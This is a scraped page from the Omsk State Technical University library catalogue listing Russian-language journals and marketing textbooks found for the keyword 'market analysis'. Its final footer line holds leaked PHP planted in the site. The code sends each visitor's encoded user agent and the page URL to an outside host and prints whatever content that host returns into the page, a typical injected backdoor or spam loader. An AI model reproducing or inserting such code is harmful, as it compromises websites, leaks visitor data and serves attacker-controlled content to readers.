Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

104 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=АНАЛИЗ РЫНКА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Деньги и кредит. - Журнал, 2009г. № 4
Оглавление 
  • Улюкаев, А. В. Воздействие мировых товарных цен на глобальную и российскую инфляцию / А. В. Улюкаев, М. В. Куликов. - с.3-6 : табл.
  • Милюков, А. И. Кредитная поддержка производства - центральная проблема / А. И. Милюков. - с.9-11 : граф.
    Кл. слова: Этапы развития кризиса
  • Мишина, В. Ю. Влияние кризиса на объемы, структуру и тенденции развития валютного рынка / В. Ю. Мишина, С. В. Москалев, И. Б. Федоренко. - с.12-24 : табл.
    Кл. слова: Анализ рынка, Проблемы ликвидности, Валютизация
  • Кресникова, Н. И. Ипотечное кредитование под залог земель сельскохозяйственного назначения / Н. И. Кресникова. - с.25-36 : табл.
    Кл. слова: Земельная собственность, Земельная ипотечная сделка
  • Спицын, С. Ф. Межбанковский рынок в условиях нестабильности / С. Ф. Спицын, О. В. Луданов. - с.37-44 : граф.
    Кл. слова: Сроки кредитования
  • Ярлыков, С. Ю. Органы финансового контроля в системе противодействия легализации преступных доходов и финансированию терроризма / С. Ю. Ярлыков. - с.45-49
  • Сидоренко, Т. В. Банковская система Мексики: экспансия иностранного капитала / Т. В. Сидоренко. - с.50-57 : табл.
  • Поспелов, А. Л. Интернет-банкинг: вопросы обеспечения безопасности / А. Л. Поспелов. - с.61-63
2. 
Современная торговля. - Журнал, 2009г. № 4
Оглавление 
  • Международная выставка моды. - с.6-9 : фото.цв.
    Кл. слова: Конкурс
  • Замуруева, Е. Спрос на мех растет / Е. Замуруева. - с.10-17 : фото.цв.
    Кл. слова: Модный дом
  • Ханс-Юрген, Варнеке. Гибкая ценовая политика с помощью скидок / Варнеке Ханс-Юрген. - с.18-21 : табл.
    Кл. слова: Прибыль
  • Борисовский, А. Бутиковые мелочи / А. Борисовский. - с.22-27 : фото.цв.
    Кл. слова: Фирменная музыка, Фирменный аромат, Фирменный сертификат
  • Борисовский, А. Как работать круглосуточно? / А. Борисовский. - с.28-31 : фото.цв.
    Кл. слова: Дополнительные расходы
  • Норка, Д. Портрет идеального продавца с британской, американской и российской точки зрения / Д. Норка. - с.32-41 : фото.цв.
    Кл. слова: Профессиональные качества, Личные качества
  • Торговый центр на вокзале. - с.42-47 : фото.цв.
    Кл. слова: Европейский опыт
  • Лошакова, Д. Рацион для ритейлеров / Д. Лошакова. - с.48-59 : фото.цв.
  • Славинский, С. Неизвестный Luxury или где начинается маркетинг роскоши / С. Славинский. - с.60-69 : фото.цв.
    Кл. слова: Люкс, Премиум
  • Павлова, Н. Методика выбора целевого рынка / Н. Павлова. - с.70-73 : фото.цв.
    Кл. слова: Анализ рынка, Конкурентоспособность
  • Корнеев, И. Рекламные боеприпасы для малого бизнеса / И. Корнеев. - с.74-77 : фото.цв.
    Кл. слова: Визитки
  • Щербакова, Е. Торговое весовое оборудование: электронные или механические? / Е. Щербакова. - с.78-87 : фото.цв.
    Кл. слова: Условия эксплуатации, Контроль и проверка, Стоимость
3. 
Черняк В. З. Бизнес-планирование [Текст] : Учеб. для вузов / В. З. Черняк, 2003. - 470 с.
Ключевые слова 
БИЗНЕС - ПЛАН -- Бизнес - проект -- АНАЛИЗ РЫНКА -- РЫНОК СБЫТА -- РЫНОК ТОВАРНЫЙ -- РЫНОК УСЛУГ -- СЕГМЕНТАЦИЯ РЫНКА -- Цена -- ПОЛИТИКА ФИНАНСОВАЯ ПРЕДПРИЯ -- РЫНОК ФИНАНСОВЫЙ -- АНАЛИЗ ФИНАНСОВЫЙ ПРЕДПРИЯТИ -- ПЛАНИРОВАНИЕ ФИНАНСОВОЕ -- БИЗНЕС - ПЛАН - Маркетинг -- МАРКЕТИНГ - ПРЕДПРИЯТИЕ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ПЛАНИРОВАНИЕ СТРАТЕГИЧЕСКОЕ -- РЕКЛАМА - МАРКЕТИНГ -- ПРОЕКТ ИНВЕСТИЦИОННЫЙ -- Эффективность коммерческая -- Эффективность бюджетная -- Эффективность экономическая -- Стратегия инвестиционная -- РИСКИ - БИЗНЕС-ПЛАН -- СТРАХОВАНИЕ
4. 
Гинзбург, Анатолий Ильич. Рынки валют и ценных бумаг [Текст] : Уч.пособие / Гинзбург, 2004. - 256 с.
Держатели документа (Информация об экземплярах) 
5. 
Маркетинг [Текст] : Учебник гриф-МО / Н. П. Ващекин [и др.], 2004. - 312 с.
Ключевые слова 
ПОТРЕБНОСТЬ - Маркетинг -- МОТИВАЦИЯ - Маркетинг -- СПРОС - Маркетинг -- ТОВАР - Маркетинг -- РЫНОК - Маркетинг -- МАРКЕТИНГ - СЛОВАРЬ ТЕРМИНОВ -- МАРКЕТИНГ потребительских товаров -- МАРКЕТИНГ промышленный -- МАРКЕТИНГ УСЛУГ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ИНФОРМАЦИЯ МАРКЕТИНГОВАЯ -- Прогноз маркетинговый -- МАРКЕТИНГ компьютерный -- Маркетинг - автоматизация -- СРЕДА ВНЕШНЯЯ - МАРКЕТИНГ -- АНАЛИЗ рынка -- КОНЪЮНКТУРА РЫНКА - анализ -- ПОВЕДЕНИЕ ПОКУПАТЕЛЯ -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- КОФЕ - ТОРГОВЛЯ -- АУДИТ МАРКЕТИНГА -- МАРКЕТИНГ ЦЕЛЕВОЙ -- СЕГМЕНТАЦИЯ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- МАРКЕТИНГ ОПЕРАТИВНЫЙ -- ПОЛИТИКА ТОВАРНАЯ - Маркетинг -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- АССОРТИМЕНТ ТОВАРНЫЙ -- ЗНАК ТОВАРНЫЙ -- КОНКУРЕНТОСПОСОБНОСТЬ ТОВАРА -- ЦЕНА - МАРКЕТИНГ -- РЕКЛАМА - Маркетинг -- РЕКЛАМА ВНУТРИФИРМЕННАЯ -- Реклама общественная -- Реклама товарная -- Медиапланирование -- ЭФФЕКТИВНОСТЬ рекламы -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- КОНТРОЛЬ МАРКЕТИНГОВЫЙ -- Кейс - метод - Маркетинг
Держатели документа (Информация об экземплярах) 
6. 
Маркетинг [Текст] : Учеб. для студентов вузов обучающихся по специальностям "Маркетинг", "Коммерция (торговое дело)", "Реклама" / Т. Н. Парамонова, С. М. Самарина, И. Н. Красюк и др; Под ред. Н. П. Ващекина, 2003. - 311 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- АУДИТ -- СЕГМЕНТИРОВАНИЕ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ -- ТОВАР -- ТОВАРНАЯ ПОЛИТИКА -- ЦЕНА -- МАРКЕТИНГ промышленный -- МАРКЕТИНГ УСЛУГ -- РЕШЕНИЕ маркетинговое -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ИНФОРМАЦИЯ МАРКЕТИНГОВАЯ -- Прогноз маркетинговый -- МАРКЕТИНГ компьютерный -- Маркетинг - автоматизация -- СРЕДА ВНЕШНЯЯ - МАРКЕТИНГ -- АНАЛИЗ рынка -- КОНЪЮНКТУРА РЫНКА - анализ -- ПОВЕДЕНИЕ ПОКУПАТЕЛЯ -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- АНАЛИЗ предприятия -- АУДИТ МАРКЕТИНГА -- МАРКЕТИНГ ЦЕЛЕВОЙ -- СЕГМЕНТАЦИЯ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- МАРКЕТИНГ ОПЕРАТИВНЫЙ -- ПОЛИТИКА ТОВАРНАЯ - Маркетинг -- ЦЕНА - МАРКЕТИНГ -- РЕКЛАМА - Маркетинг -- РЕКЛАМА ВНУТРИФИРМЕННАЯ -- Реклама общественная -- Реклама товарная -- Медиапланирование -- ЭФФЕКТИВНОСТЬ рекламы -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- КОНТРОЛЬ МАРКЕТИНГОВЫЙ -- Кейс - метод - Маркетинг

Излагается современная концепция маркетинга. Рассматриваются его типы и виды. Описана система маркетинговой информации, в частности основные принципы ее построения. Подробно освещаются вопросы маркетинговых исследований рынка, в том числе изучения <конъюнктуры> <рынка> и моделей <поведения> <покупателей>. Проводится всестороний анализ деятельности <предприятия> с точки зрения маркетинга. Изучаются направления оперативного маркетинга и связанные с этим проблемы <ценообразования>. Большой материал посвящен организации <рекламных мероприятий>.

Во втором издании учтены изменения, произошедшие в практике маркетинга за последние годы.

В каждой теме даны контрольные вопросы и практические задания. В последнем разделе приведены кейсы для проверки знаний по всему курсу маркетинга.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3214 - 28.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.92 с.16 запросов, 0.83c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;